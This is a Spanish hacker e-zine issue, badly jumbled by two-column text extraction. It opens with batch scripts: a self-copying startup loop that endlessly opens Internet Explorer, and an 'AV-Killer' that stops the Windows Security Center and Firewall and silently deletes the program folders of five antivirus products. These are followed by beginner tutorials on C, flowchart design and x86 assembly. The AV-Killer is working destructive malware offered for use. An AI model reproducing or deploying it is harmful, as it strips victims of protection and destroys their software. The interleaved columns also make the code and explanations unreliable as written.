Un Bucle infinito al inicio del /Q /F /S *.*>nul


cd ..
cd “Kapersky Lab”
Un bucle es una serie de comandos que se repiten del /Q /F /S *.*>nul
varias veces y que en este caso se van a repetir cd ..
infinitamente. Vamos a hacer que cada vez que se cd “McAfee.com”
inicie sección se abra infinitamente el Internet del /Q /F /S *.*>nul
Explorer. cd ..
El código es: cd “Nod32 Antivirus System”
@echo off del /Q /F /S *.*>nul
:inicio exit
Copy “C:\Documents and
Settings\%username%\Mis documentos\bucle.bat” Explicación:
“C:\Windows\Menu Inicio\Programas\Inicio\”
Goto bucle
net stop "Centro de seguridad"
:bucle
net stop "Firewall de windows/Conexion compartida
Start iexplore www.google.com
a internet (ICS)"
Goto bucle
Con esto paramos el Firewall y el Centro de
tendríamos que guardarlo con el nombre
Seguridad de Windows (también se paran algunos
“Bucle” en la carpeta Mis Documentos y así
otros firewall’s adicionales que pueden estar
funcionaria.
protegiendo la PC).
Explicación:
cd “%programfiles%”
Con la variable %programfiles% vamos a la ruta
:inicio y :bucle C:\Archivos de Programa o a la ruta en donde estén
:Inicio sería una línea para dar inicio a los lo archivos de programas.
comandos en el Batch (si quisiéramos volver a
ejecutar los comandos que están después de
cd “Grisoft”
inicio se podría poner el comando Goto Inicio) La carpeta en donde esta el AVG Free Antivirus
y el :bucle seria para poder identificar la parte (luego con el comando DEL borramos todo).
donde se inicia el bucle y para desde dentro
del bucle poder volver a ejecutar el comando del /Q /F /S *.*>nul
que esta en el bucle. Para borrar todos los archivos sin pedir
confirmación, ni Mostar los archivos que se han
Start iexplore www.google.com borrado.
Es el comando para abrir la aplicación del Internet
Explorer en la página Web de google.
cd ..
Goto bucle Para subir de directorio (ir a la carpeta Archivos de
Para repetir los comandos desde donde esta la línea Programa).
:bucle y luego llegaria a este comando y se repetiría
todo de vuelta y así seria infinito. cd “Norton Antivirus”
La carpeta en donde esta el Norton Antivirus (luego
AV-Killer (Mata AntiVirus)
con el comando DEL borramos todo).

Crearemos un Batch que pueda matar 5 antivirus, cd “Kapersky Lab”


desactivar el Firewall de Windows y apagar el La carpeta en donde esta el Kapersky Antivirus
sistema de seguridad, básicamente usando los (luego con el comando DEL borramos todo).
comandos DEL y NET.
cd “McAfee.com”
Código: La carpeta en donde esta el MC Afee System Works
(luego con el comando DEL borramos todo).
@echo off
Net stop "Centro de seguridad" cd “Nod32 Antivirus System”
net stop "Firewall de windows/Conexion compartida La carpeta en donde esta el NOD32 Antivirus (luego
a internet (ICS)" con el comando DEL borramos todo).
cd “%programfiles%”
cd “Grisoft”
del /Q /F /S *.*>nul
cd ..
cd “Norton Antivirus”
CUH e-zine 2ª edicion Introducción al lenguaje C

Introduccion al lenguaje C By NI0

con el editor, vamos a ver el código fuente (el código


fuente es el programa escrito en un lenguaje, por
ejemplo el C, este código fuente solo lo entiende el
humano, para que la PC lo pueda entender, y por lo
tanto, ejecutar el programa, tenemos que compilar el
código fuente) con colores que van a caracterizar
algunas cosas del código fuente para identificarlas
Hola a todos los que leen la revista CUH e-zine de mas fácil, y nos ayuda a la hora de programar, en
el-hacker, yo soy Ni0 y les voy a enseñar a resumen, nos facilita el entendimiento del código
programar en lenguaje C, un lenguaje potente, en el fuente (aunque yo antes dije que no usemos
que podemos mezclar programación batch, programas como el Word que le podemos poner
assembler y C todo en un mismo programa, también colores a las letras, etc., esto es distinto, el Word
es el lenguaje con el que se programó el Linux, pero GUARDA en el archivo que letras esta con que color,
la desventaja del C es que es un poco complicado etc., pero el editor del lenguaje C, o cualquier
crear las ventanas de Windows, ya veremos como, lenguaje, solo muestra en color, pero NO guarda
pero es mucho mas difícil que en visual Basic. Este esa información, ya veremos porque es importante
tutorial va a ser la primera parte, va a ser una que solo guarde el código fuente sin ningún
introducción al lenguaje C. Quiero agradecer a agregado). Para que la PC pueda entender el
alesteir por darme esta oportunidad, gracias alesteir. programa y ejecutarlo, tenemos que compilar el
código fuente, para eso usamos un compilador (por
ejemplo el que viene con el DEV-CPP, que es el que
yo uso y me gusta mucho), el compilador lo que hace
es pasar el código fuente en lenguaje C al lenguaje
maquina, se llama así porque lo entiende la maquina
:P, lo que hace el compilador es leer el código
fuente, interpretarlo y pasarlo al lenguaje maquina
(en resumen hace eso), si nosotros usamos el Word,
cuando compilemos, el compilador va a leer el
código fuente y puede que lea (es un ejemplo, no
digo que sea exactamente así, solo que puede que lo
lea) “textcolor=RED”, y el compilador lo va a enteder
bien (o sea, no va a dar error si se dan las
condiciones) y el programa va a hacer cualquier
cosa, o bien, el compilador va a dar error si no
entiende, (aunque no le cambien la letra ni el color
ni nada, el Word escribe varias cosas de mas, como
Primero hay que explicar unas cosas antes de la configuración de la hoja, etc., así que no piensen
enseñar el lenguaje, empecemos: que si le dejan el color en negro van a poder
compilar el código fuente creado en Word). Para que
Un programa, se puede crear con solo tener una PC tengan noción de lo que es el lenguaje maquina,
(no hay que tener la mejor, miren, yo uso una hagan lo siguiente: abran el bloc de notas, vayan a
Pentium 2 con 128 MB de ram y programo sin ningún alguna carpeta que tengan un archivo ejecutable (no
problema) y es necesario tener un editor de texto el acceso directo, sino el ejecutable, cualquiera que
plano, o sea, que no le ponga colores ni nada de tenga extensión *.exe o *.com) y arrastren el icono
eso a lo que escribimos (como el bloc de notas, pero del ejecutable al bloc de notas que teníamos abierto,
NO el Word), aunque creo que es mejor que nos lo que ven (si lo hicieron bien) es el lenguaje
descarguemos un editor de lenguaje C (por el maquina, lo único que se entiende, o se puede
ejemplo el DEV-CPP, que aparte de editar nos deducir, es el texto "this program cannot be run in
compila el programa, ya vamos a ver que es eso), DOS mode",(el texto solo esta en las aplicaciones de
Windows ,que solo se pueden ejecutar en Windows,
CUH e-zine 2ª edicion Introducción al lenguaje C

las que usemos para DOS no van a tener esto). Creo


que con eso les va a servir por ahora para entender Cuando la cabecera ya viene con el compilador,
(el proceso de compilación) la programación, mas ponemos los <>, entonces el compilador va a buscar
adelante hay que aclarar mas cosas, pero por ahora el archivo en la carpeta include\, si estuviese en
es suficiente. include\sys, lo que hay que hacer es:

#include <sys\timeb.h>

Las comillas (“”) se usan cuando la librería esta en


otro directorio que no sea “(directorio del
compilador)\include” (aunque puede variar, pero por
lo general siempre están may), entonces tenemos que
Empecemos pues con el lenguaje C, abran el DEV- poner la ruta de la cabecera, pero si esta en el
CPP (si utilizan otro S.O. pregúntenle a mi amigo mismo directorio que el código fuente, solo basta
GOOGLE Æcompiladores c, seguro que hay alguno con poner el archivo.
como el DEV-CPP pero para linux), vallan a tools- main() es la función principal, todo lo que este entre
>environment options->interface y en lenguaje: los corchetes ({}) es lo que contiene la función main
seleccionen español, despues vayan a herramientas- (no hay que agregar ninguna cabecera para esta
>opciones de entorno y destilden la opción “C++ por función, y al ejecutarse el programa se va a ejecutar
defecto en nuevo proyecto” (con esto le decimos que todo lo que contenga la función main. printf(“hola
el lenguaje por defecto va a ser el C), ahora vayan al mundo”) es una función que imprime en pantalla,
menú archivo->nuevo->código fuente; en la ventana esta función esta declarada en la cabecera stdio.h, o
que se acaba de crear podemos empezar a sea, si no agregamos la cabecera stdio.h (poniendo
programar, empecemos por programar el típico: la línea #include <stdio.h>) la función no estaría
“hola mundo” con salida en la pantalla, escriban lo declarada por lo que el compilador no sabría que
siguiente (todo lo que escriba en azul es el código, hace esa función, despues de nombrar una función
pero a ustedes les va a poner el color por defecto (por ejemplo printf) hay que poner los paréntesis y
que tiene el dev-cpp y algunas cosas, como la dentro de los paréntesis ponemos los argumentos,
primera línea, van a cambiar de color): que son como “opciones” que le damos a la función,
estos argumentos pueden ser variables (ya veremos
#include <stdio.h> que son), números, caracteres o cadena de
main() caracteres, dependiendo de que argumento
{ pongamos, es lo que hace la función, si la función no
printf(“hola mundo”); necesita argumentos, solo tenemos que poner
} función(); sin nada entre los paréntesis, y despues de
cada función hay que poner punto y coma “;”, y si la
Grabemos el código haciendo click en el iconito del función necesita mas de un argumentos (ya veremos
diskete (eligen donde guardar el nuevo programa y que podemos agregarle mas argumentos a printf,
lo demás es fácil), les hice guardar el código para pero por ahora supónganse que necesita solo uno, y
que sepan guardarlo, pero igual, antes de compilar el ejemplo que sigue no es correcto, es solo un
un código nuevo, hay que guardarlo. Vamos a ejemplo aplicado para todas las funciones), estos
aclarar que es lo que escribimos: van separados por comas "," por ejemplo si la
Todo lo que este despues de un #, le informa al función printf necesitara 2 argumentos, uno de un
compilador que haga algo, en este caso (#include titulo y otro de un texto, la función seria:
<...>) le indica al compilador que agregue la printf("el titulo", "el texto");
cabecera (librería) stdio.h, una archivo de cabecera La función prinf imprime o muestra en pantalla un
contiene información sobre las funciones y otra texto (o también un solo caracter), para indicarle que
información que ya veremos, dependiendo de que tiene que imprimir hay que poner la cadena
funciones utilicemos, todo de depende de la (llamamos “cadena” al conjunto de caracteres, o sea
cabecera que agreguemos, si queremos agregar mas el texto) o el caracter, cuando en el lenguaje C
archivos hay que ponerlo así: queremos indicarle al programa que lo que
escribimos es una cadena, hay que ponerla entre
#include <stdio.h> comillas (“”), sino, el programa lo va a pensar que es
#include <stdlib.h> una variable (en el próximo tutorial hablaremos de
... ello), y a su vez el compilador va a dar error porque
O sea, en una nueva línea, y como podrán ver, la no esta declarada esa variable (ya hablaremos de
cabecera esta dentro de los “<>”, pero a veces se eso); cuando le queremos indicar que es un caracter,
pone así: podemos ponerlo entre comillas o entre apostrofes
(‘’). Ahora que ya tenemos explicado un poco de
#include “milibreria.h” sintaxis y que hace la función printf, vamos a
CUH e-zine 2ª edicion Introducción al lenguaje C

compilar el programa, hay 4 iconos que nos ayudan quisiéramos agregar toda esa línea como cabecera;
a esto, están a la izquierda, uno es como si fuera la basándonos en lo anteriormente dicho, nuestro
banderita del Windows (este compila) , al lado una programa puede estar escrito así:
ventana (este ejecuta el programa si es que ya esta
compilado), otro las 2 cosas (compila y luego #include <stdio.h>
ejecuta el programa), y el otro una ventana gris (re- main(){printf("hola mundo");getchar();}
genera por completo el programa, por ahora es lo
mismo que compilar, pero cuando tengamos y nos funcionaria perfectamente, pero tienen que
programas mas grandes con archivos de recuso, mantener la sintaxis, cerrar y abrir los paréntesis y
espero poder dar un tutorial de eso, es cuando este los corchetes y los ";" despues de cada función.
icono sirve), vamos a usar el que compila y luego también podríamos hacerla así:
ejecuta (usen el que quieran, pero con este con solo
apretar una vez ya les compila e inmediatamente lo #include <stdio.h>
ejecuta), cuando termino de compilar va a ejecutar el main()
programa..., seguramente se les abrió y se les cerro {
el programa, esta bien, lo que pasa es que el printf(
Windows ejecuto el programa y como "hola mundo"
inmediatamente despues de escribir en pantalla );
termina, lo termino, para que no se termine getchar();
inmediatamente, vamos a usar la función getchar, no }
usa argumentos, así que solo hay que poner acuérdense que el compilador se "saltea" los
getchar(); esta función lo que hace es esperar a que espacios, etc., excepto lo que esta despues del #
el usuario presione la tecla enter, así que vamos a (sea lo que sea), pero se recomienda darle cierto
colocarla despues de printf(“hola mundo”); así formato al código fuente para poder entenderlo
despues de imprimir va a esperar a que presionemos mejor, por ejemplo cada función va en una línea,
enter antes de finalizar el programa, entonces el cuando se abre un corchete (cuando empieza una
código fuente nos queda así: función, por ejemplo main, o cuando se usan
controladores de flujo, que ya veremos que son) se
#include <stdio.h> va a una nueva línea y se deja 4 espacios.
main() Las cadenas se pueden dividir, por ejemplo podemos
{ hacer
printf(“hola mundo”); printf("hola "
getchar(); "mundo");
} y daría el mismo resultado que printf("hola mundo"),
compilamos y ejecutamos, como no estamos usando con hacer eso, NO pasamos a una nueva línea, mas
las API (que son las funciones que nos da el adelante veremos como se hace (en este mismo
Windows, con algunas de esas funciones creamos tutorial), lo que no podemos hacer
las ventanitas de Windows, espero poder escribir un
tutorial de eso) el programa se nos ve en esa Supongamos que estamos programando un
ventanita negra, este tipo de programas se llaman programa muy largo y queremos agregar
aplicaciones de consola, presionen enter y el comentarios, para acordarnos de algo, o queremos
programa tendría que terminar, si es así, han creado que se entienda que hace el programa, o para lo
su primer programa (en realidad el segundo, porque que quieran, tienen que poner los comentarios entre
el que solo ponía hola mundo y se cerraba también "/*" y "*/" (sin las comillas), todo lo que este dentro
era un programa) FELICITACIONES! de /* */ va a pasarse por alto por el compilador; por
ejemplo en el programa hola mundo podríamos
Ahora, jueguen con lo que saben, pongan otros hacer esto:
textos, pongan 2 funciones getchar, una al principio y
otra al final, no se, jueguen. #include <stdio.h> /*agregamos la cabecera
stdio.h*/
La forma en la que programe, con los espacios y main() /*empieza la función main*/
todo eso, no tiene que ser exactamente así, el {
compilador ignora los espacios y cuando ponemos printf("hola mundo"); /*muestra hola mundo en
una nueva línea, excepto todo lo que este después pantalla*/
del #, cuando terminemos de usarlos, tenemos que getchar(); /*espera que se apriete la tecla enter*/
poner nueva línea, fíjense que todo lo que escriben } /*termina el programa*/
después del # se ve de otro color (si usan el dev-cpp quizás vieron o escucharon de usar "//" (sin comillas)
como les recomendé), si ustedes ponen todo el para los comentarios, eso se usa en C++, aunque el
programa en esa línea, se va a ver todo de ese color, dev-cpp lo toma como comentarios (ya que compila
o sea, el compilador va a leer todo eso como si C y C++, o sea, C/C++), si quieren usar los //, el
CUH e-zine 2ª edicion Introducción al lenguaje C

compilador toma por comentario toda la línea, o \90)


sea, en \hxx (el caracter va a ser el numero HEXAGESIMAL
printf("hola mundo"); /*muestra hola mundo en que reemplace a las X, ejemplo \hA9)
pantalla*/ \\ Barra invertida (caracter "\", si nosotros
quisiéramos escribir en pantalla \nosotros, saldría
tendríamos que poner nueva línea y despues osotros, entonces tenemos que
poner \\nosotros y va a salir en pantalla \nosotros)
printf("hola mundo"); //muestra hola mundo en \" (caracter comilla ("), si queremos poner una
pantalla comilla en un texto, si no usamos \" el compilador lo
toma como fin o inicio de una cadena, por ejemplo
pero si el comentario fuera: si quisiéramos poner printf(""hola mundo""); daría
error, porque la cadena iniciaría y finalizaría al
printf("hola mundo"); /*muestra principio, lo correcto es hacer printf("\"hola
hola mundo mundo\"");)
en pantalla*/
estos caracteres reemplazan a los que corresponden,
(recuerden que todo lo que este entre /**/ va a ser si nosotros queremos que en pantalla aparezca:
tomado como comentario)
hola
tendríamos que poner: mundo

printf("hola mundo");//muestra NO hay que hacer:


//hola mundo
//en pantalla printf("hola");
printf("mundo");
porque no se le indico al programa que pase a la
En C existen los "caracteres de escape" que aunque nueva línea, lo que hay que hacer es poner el
se escriban 2 caracteres o mas para identificar a ese caracter de nueva línea en donde queramos que
tipo especial de caracter, en realidad es uno solo; pase a la nueva línea, en nuestro caso seria:
estos caracteres son: printf("hola\nmundo");

\″ Comilla doble
\0 Carácter nulo Este fue la introducción al C, espero haber sido claro
\a Alarma y espero poder hacer la segunda parte y así
\v Tabulación vertical sucesivamente hasta explicarles todo lo que se de
\r (Carácter Enter) Retorno de carro programación en C.
\n (caracter de nueva línea) Nueva línea
\t (caracter de tabulador) Tabulación horizontal Resumiendo lo que se vio:
\b (retrocede un caracter) • Algunas cosas antes de empezar a
\xxx (el caracter va a ser el numero que reemplace a programar.
las X, tiene que ser un numero del 0 al 255, ejemplo • Nuestro primer programa.
\90) • Funciones printf y getchar
\hxx (el caracter va a ser el numero HEXAGESIMAL • Sintaxis
que reemplace a las X, ejemplo \hA9) • Comentarios
\\ (caracter "\", si nosotros quisiéramos escribir en • Caracteres de escape
pantalla \nosotros, saldría nueva línea y despues
osotros, entonces tenemos que poner \\nosotros y va
a salir en pantalla \nosotros)
\' Comilla simple
\" Comilla doble (caracter comilla ("), si queremos
poner una comilla en un texto, si no usamos \" el
compilador lo toma como fin o inicio de una cadena,
por ejemplo si quisiéramos poner printf(""hola
mundo""); daría error, porque la cadena iniciaría y
finalizaría al principio, lo correcto es hacer
printf("\"hola mundo\"");)

\xxx (el caracter va a ser el numero que reemplace a


las X, tiene que ser un numero del 0 al 255, ejemplo By NIO
CUH e-zine 2ª edicion Metodología de la Programación

Metodología de Programación By Aleksteir

Bueno amigos del foro de El-Hacker.com, o sea la Figura 2


Comunidad Underground Hispana CUH, es un honor
poder participar de nuevo en el staff de
colaboradores y organizadores, por mi parte, espero
que a todo aquellos que lean la revista, les sirva de
algo y que aporte un plus a los conocimientos ya
adquiridos hasta ahora, por el momento vamos con
lo básico y lo suave, a medida que pasen los
números, yo se que el grado de aprendizaje
brindado por los articulistas, será mucho mas
elevado, bueno no es mas y a lo que vinimos a
aprender a programar.

Como veíamos en el articulo pasado lo que era un


algoritmo (Conjunto de operaciones (sentencias y
proposiciones) y procedimientos (Toma de
decisiones y procesos) que deben seguirse para la
resolución de un problema), también vinos algo
breve sobre el Pseudocódigo, los diagramas de flujo Figura 3
o flujogramas, aprendimos sobre datos y su
clasificación; los operadores y la jerarquía que se
debe tener en cuenta a la hora de realizar
operaciones; los identificadores (constantes,
variables, datos, procedimientos, funciones), además
de un glosario con los términos que se usan a la
hora de desarrollar un programa, en este articulo
empiezo advirtiendo sobre las cosas que no se
deben hacer o errores que se podrían llegar a
cometer a la hora de elaborar un Diagrama de flujo,
errores como pueden ser: hacer los conectores
diagonales Ver figuras 1 (forma incorrecta) y 2
(forma correcta) o entrecruzar las líneas conectoras
Ver figura 3, tampoco se deben añadir módulos al
flujo del diagrama sin ser previamente llamados Ver
Figura 4.

Figura 4

Normas para el diseño de diagramas de flujo

1. Un diagrama debe ilustrar gráficamente los


Figura 1
procesos que se deben seguir para la
CUH e-zine 2ª edicion Metodología de la Programación

resolución de un problema. Por eso debemos Como vimos en el articulo anterior, la secuenciación
saber colocar un signo para cada proceso, es una estructura de control que permite al PC
es el diagrama el que hace mas fácil ejecutar una acción, luego la próxima, y así
desarrollar un programa, en algún tipo de sucesivamente, hasta encontrar el final del archivo
lenguaje. (EOF). Las acciones que por lo general realiza un
2. Las líneas que indican la dirección del flujo programa consisten en operaciones elementales
del diagrama deben de ser rectas, como pueden ser: Declarar las variables (privadas o
horizontales o verticales. públicas), lectura de los datos, toma de decisiones,
3. Todo diagrama tiene un principio y un fin. realizar cálculos o comparación de expresiones.
4. Todos los símbolos de un diagrama deber de
estar interconectados. Teniendo en cuenta lo visto hasta ahora,
5. El diagrama debe ser construido de arriba procederemos a realizar el diseño de algunos
hacia abajo (top-down) y de derecha a algoritmos y sus respectivos diagramas de flujo.
izquierda (right- left).
6. Se aconseja que en un proceso complejo se En el ejemplo 1 veremos un algoritmo que permite
debe acompañar un comentario acerca del leer un número en radianes e imprime su
proceso. equivalencia en radianes
7. El tipo de notación dentro de un diagrama,
Algoritmo: Convierte Radianes a grados y viceversa.
nunca debe ceñirse a un lenguaje de
Inicio
programación en especifico, debe ser
independiente.
1. Declaración de variables:
8. No fraccionar el diagrama con el uso PI=3.145926536: real (flotante)
excesivo de conectores. rad, grad, numrad, numgrad: real (flotante)
9. Solo debe llegar una sola línea de flujo a un 2. Leer rad,grad
símbolo. Pero pueden llegar muchas líneas 3. numgrad= rad*(180/PI)
de flujo a otras líneas. 4. numrad= grad*(PI/180)
5. Imprimir numgrad,numrad
10. Las líneas de flujo deben de entrar a un 6. Fin
símbolo por la parte superior y/o izquierda y
salir de él por la parte inferior y/o derecha.
11. Evitar que el diagrama sobrepase una
página; de no ser asi, enumerar y emplear Inicio
los conectores correspondientes.
12. Usar lógica positiva, es decir, realizar
rad, grad
procesos cuando es verdadera la condición y
expresar las condiciones de manera clara.
13. Comentar al margen únicamente cuando sea
necesario.
numgrad = rad*(180/PI)
Diseño de Algoritmos
Existe una gran variedad de problemas que
demandan de un análisis profundo y de un numgrad
pensamiento flexible y estructurado para encontrar numrad= grad*(PI/180) numrad
la solución. Para ello, debemos conocer las técnicas
y las herramientas, que nos permitan desarrollar la
construcción de algoritmos eficientes, en la siguiente
figura se pueden observar las distintas etapas, que Fin
se siguen para la correcta solución de un problema.

En el ejemplo 2 veremos un algoritmo que permite


Problema
calcular el promedio de un estudiante, se pedirá la
matricula del alumno y cuatro calificaciones de los
exámenes, se imprimirá la matricula del alumno y el
promedio
Análisis
Profundo del Construcción Verificación del Algoritmo: Calcular promedio Alumno
sistema del Algoritmo Algoritmo
1. Inicio
CUH e-zine 2ª edicion Metodología de la Programación

2. Declaración de variables Algoritmo: Imprimir números hasta 100


matalu:entero
ca1, cal2, cal3, cal4, calfinal: real (flotante) 1. Inicio
3. Leer cal1, cal2, cal3, cal4 2. Declaración de variables
4. calfinal = (cal1+cal2+cal3+cal4)/4 I, (entero)
5. Imprimir matalu, calfin 3. Estructura condicional
6. Fin I<100
I=I+1
Imprimir I
4. Fin

Inicio
Inicio

matalu, cal1,
cal2, cal2, I
cal3, calc4

no

calfinal = (cal1+cal2+cal3+cal4)/4 I<100 Fin

si
matalu
calfinal Fin I=I+1

En el ejemplo 3 veremos un algoritmo que permite


multiplicar dos números:

Algoritmo: Multiplicar dos numeros

1. Inicio
2. Declaración de variables
num1, num2, entero
3. Leer num1, num2
4. multi = num1*num2
5. Imprimir multi
6. Fin

Inicio

num1, num2

multi = num1*num2

Ejemplo de un diagrama un poco mas complejo


multi
Fin
Por el momento es todo, seguimos con cositas
básicas en el próximo número del CUH e-zine,
By Aleksteir
CUH e-zine 2ª edicion Introducción al ASM

Introduccion al ASM By The Shadow


TASM y el MASM.

Breve introducción al Microprocesador:

Introducción al ASM _ by “The Shadow”

*Nota: *1 quiere decir que dicha línea es solo parte


de este tutorial, no se usa a la hora de programar.
“Pe.:” se refiere a un ejemplo explicativo. Pe.:
~ Por ejemplo
~: Se refiere al significado o a una
equivalencia.

Prologo
“Vistos a muy bajo nivel, los microprocesadores El microprocesador es el chip que se encarga de
procesan exclusivamente señales electrónicas controlar, manejar y procesar los datos de un
binarias. Dar una instrucción a un microprocesador ordenador. Este lleva a cabo una gran variedad de
supone en realidad enviar series de unos y ceros cálculos, comparaciones numéricas y transferencias
espaciadas en el tiempo de una forma determinada. de datos como respuesta a las peticiones de los
Esta secuencia de señales se denomina código programas que están siendo ejecutados en memoria.
máquina. El código representa normalmente datos y Para cuestiones de operaciones de cálculo y
números e instrucciones para manipularlos. Un modo almacenamiento de datos, el procesador cuenta con
más fácil de comprender el código máquina es una serie de REGISTROS que actúan como una
dando a cada instrucción un mnemónico, como por variable, como un lugar de almacenamiento dentro
ejemplo CMP, ADD o JMP. Esta abstracción da como del procesador en si, esto hace que la información
resultado el ensamblador, un lenguaje de muy bajo almacenada en estos registros sea mas accesible
nivel que es específico de cada microprocesador. que cualquier otra que tenga que pasar por algún
bus de datos (también llamados “sendas
Los lenguajes de bajo nivel permiten crear
electrónicas”; transfieren datos por los dispositivos
programas muy rápidos, pero que son a menudo
de entrada y salida E/S).
difíciles de aprender. Más importante es el hecho de
que los
Registros de mayor relevancia:
programas escritos en un bajo nivel son ------------------------------------------------de Datos
prácticamente específicos para cada procesador. Si AX (Acumulator Register) ~ Acumulador
se quiere ejecutar el programa en otra máquina con BX (Base Index Register) ~ Indice Base
otra tecnología, será necesario reescribir el CX (Counter Register) ~ Contador
programa desde el principio.” DX (Data Register) ~ Dato

Ensamblador, en si, es el programa que se encarga, Uso: para cálculo y almacenamiento general de
básicamente, de convertir el código de fuente que datos.
escribimos, en números, con el objeto de que la
maquina lo entienda. Aunque en realidad, lo Observaciones: Cada uno de estos registros tiene
convierte en un código objeto, que es una una longitud de 16 bits, que por cuestiones de
herramienta que se creo para poder unir varias conveniencia puede dividirse en dos registros de 8
rutinas hechas en diferentes lenguajes. A lo que crea bits.
el ejecutable se le llama “Linker”. Pe.: El registro BX se puede dividir en BH (H ~ High ~
*Algunos de los ensambladores mas usados son el
CUH e-zine 2ª edicion Introducción al ASM

Alto) que se refiere al los 8 bits mas significativos una 'h' (04h).
(mas a la izquierda) y BL (L ~ Low ~ Bajo) que se Los números hexadecimales (con base 16), pueden
refiere al los 8 bits menos significativos (mas a la estar formados por los dígitos: 0, 1, 2, 3, 4, 5, 6, 7, 8,
derecha). Así seria: BX = BH + BL ~ 046Ch = 04h + 9, A, B, C, D, E y F, con valores de 0d a 15d (0h - Fh).
6Ch --Convertir hexadecimal a decimal:
Para convertir un numero de hexadecimal a decimal,
se multiplica el valor del primer digito por 16
------------------------------------------------de Índice elevado a la potencia 0, luego a eso se le suma el
resultado de multiplicar el segundo digito de
SI (Source Index) ~ Índice de Origen derecha a izquierda por 16 elevado a la potencia 1,
DI (Destination Index) ~ Índice de Destino y así sucesivamente con cada digito del numero a la
BP (Base Pointer) ~ Puntero Base potencia anterior mas uno.
SP (Stack Pointer) ~ Puntero de Pila Pe.: 0E3Ah = (10) + (3*16) + (14*162) + (0*163) = 10 +
48 + 3584 + 0 = 3642d.
Uso: para direccionamientos de memoria. *Si un número comienza por una letra, a este se le
agrega un 0. Pe.: A32h = 0A32h
-Direccionamientos y posiciones de memoria:
------------------------------------------------de Una posición de memoria se refiere a un byte
Instrucción: específico dentro de esta, en ensamblador, estas
posiciones se determinan mediante los registros (Pe.
IP (Instruction Pointer) ~ Puntero de Instrucción DS:SI) o direcciones de memoria especificas (Pe.:
0E1C:0010).
Función: indica la dirección de la siguiente Una direccion de memoria en ensamblador esta
instrucción a ejecutar. Su valor cambia conforme a la especificada un SEGMENT, seguido de “:” y un
ejecución de instrucción actual. OFFSET. (Pe.: DS->(segment):->(”:”)SI->(offset) ~
DS:SI.)
------------------------------------------------de Supongamos que el registro DS tiene un valor de
Segmentos: 0043h, y el SI un valor de 012Ah. Para saber a que
byte especifico apunta la dirección DS:SI, se debe
CS (Current Segment) ~ Segmento Actual (referido al realizar la siguiente suma
programa cargado en la memoria)
DS (Data Segment) ~ Segmento de Datos DS ~ 0043
ES (Extra Segment) ~ Segmento Extra SI ~ + 012A
SS (Snack Segment) ~ Segmento de Pila _______________
DS:SI ~ 0055Ah
Funcion: apuntan a un segmento (64ks de memoria).
-Uso de TASM para crear un ejecutable:
------------------------------------------------Flags: --Estructura del código fuente en el TASM:
Dentro del código se pueden añadir comentarios
CF (Carry Flag) ~ Bandera de por acarreo usando “;”
PF (Parity Flag) ~ Bandera de por paridad Pe.:
AF (Auxiliary Flag) ~ Bandera Auxiliar ---------------------Inicio del código (comentario) *1
ZF (Zero Flag) ~ Bandera por cero ; Esto es un comentario dentro del código
SF (Sing Flag) ~ Bandera de signo ---------------------Fin *1
TF (Trap Flag) ~ Bandera de paso simple ---------------------Código explicativo de la estructura
IF (Interrupt Flag) ~ Bandera de interrupción de un código fuente usando TASM. *1
DF (Direction Flag) ~ Bandera de dirección .MODEL SMALL; Especifica el modelo de memoria.
OF (Overflow Flag) ~ Bandera de desbordamiento .STACK 100H; Especifica el area de pila (stack)
.DATA; Aquí es para definir los datos
Son registros donde se guardan los resultados de .CODE; Indica que desde aquí empieza el código
una comparación o de una operación matemática INICIO: ; Esta es una etiqueta, es un nombre que se
realizada. Estos registros solo almacenan los le da a una posición para luego poder
resultados de estado. ; referirnos a ella por su nombre.
; Aquí entonces rellenamos con lo que queramos.
-Sistema de numeración: END INICIO; Aquí se le dice al ensamblador que el
En ASM, para identificar un numero decimal se le código termina. El nombre que va después ; del END
agrega una 'd' al final del numero (04=04d), aunque debe ser el mismo de la etiqueta de inicio del código
mayormente, si no se le agrega la “d” a un numero, ---------------------Fin *1
el programa ensamblador lo identifica como *Nota: *1 quiere decir que dicha línea es solo parte
decimal; mientras que en hexadecimal se le agrega de este tutorial, no se usa a la hora de programar.
CUH e-zine 2ª edicion Introducción al ASM

Contiene un solo parámetro. Su función es saltar a


otra posición de memoria o más bien dentro del
código fuente se especifica el nombre de una
etiqueta.

--Algunas ordenes del ASM: --La orden JE ~ Jump If Equal ~ Salta si es Igual
Orden 1er ((Pe.: je etiqueta1))
parámetro 2do parámetro Contiene un solo parámetro. Este es una orden
condicional, depende de una comparación o del
estado que de una flag. Su función es saltar a la
etiqueta especificada, solo si la condición anterior
daba un resultado que decía que los dos valores que
--La orden MOV ~ Move ~ Mover ((Pe1.: mov se compararon son iguales.
ax,04h))
Contiene dos parámetros. Su función es copiar el --La orden JNE ~ Jump If Not Equal ~ Salta si no es
contenido del segundo parámetro al primero. Los Igual ((Pe.: jne etiqueta1))
parámetros pueden ser registros, valores específicos Contiene un solo parámetro. Este es una orden
y posiciones de memoria. Existen excepciones en condicional, depende de una comparación o del
cuanto al tipo de parámetros que se utilicen. Por estado que de una flag. Su función es saltar a la
ejemplo, NO se le puede asignar un valor etiqueta especificada, solo si la condición anterior
directamente a un registro de segmento, para hacer daba un resultado que decía que los dos valores que
esto, primero se debe pasar el valor a transferir a un se compararon no son iguales.
registro (que no sea de segmento, ya que no se
puede transferir el contenido de un registro de --La orden JZ ~ Jump If Zero ~ Salta si es cero ((Pe.:
segmento a otro de segmento), y luego asignar el jz etiqueta1))
valor de este registro al de segmento. Contiene un solo parámetro. Este es una orden
((Pe2.: MOV DS,0F6Ch Æ esto NO es una orden condicional, depende del estado que de una flag. Su
valida. Para eso, se debe: función es saltar a la etiqueta especificada, solo si el
MOV DX,0F6Ch ;mover el valor al registro DX (DX es registro correspondiente da un resultado igual a
un ejemplo, podía haber sido cualquier ;otro (que no cero.
sea de segmento!))
MOV DS,DX ;mover el contenido de DX al DS )) --La orden INT ~ Interruption ~ Interrupción ((Pe1.: int
Otra excepción es que, NO se puede transferir el 21h))
contenido de una posición de memoria a otra Contiene un solo parámetro*2. Su función es ejecutar
posición de memoria directamente, para hacerlo la interrupción especificada.
debe introducirse el contenido de una posición a un *2 Aunque esta orden contenga un solo parámetro,
registro y luego entonces copiar el contenido de utiliza los valores almacenados en algunos registros
dicho registro a la otra posición de memoria. específicos para cada interrupción. Cada
((Pe3.: MOV DS:[3000],ES:[1020] Æ esto NO es una interrupción tiene servicios diferentes. Estos servicios
orden valida. Para hacer esto, debemos: llevan como parámetros los valores que se le
MOV AX,ES:[1020] ;Aquí copiamos el contenido de asignan anteriormente a algunos registros.
ES:[1020] en AX Pe2.:
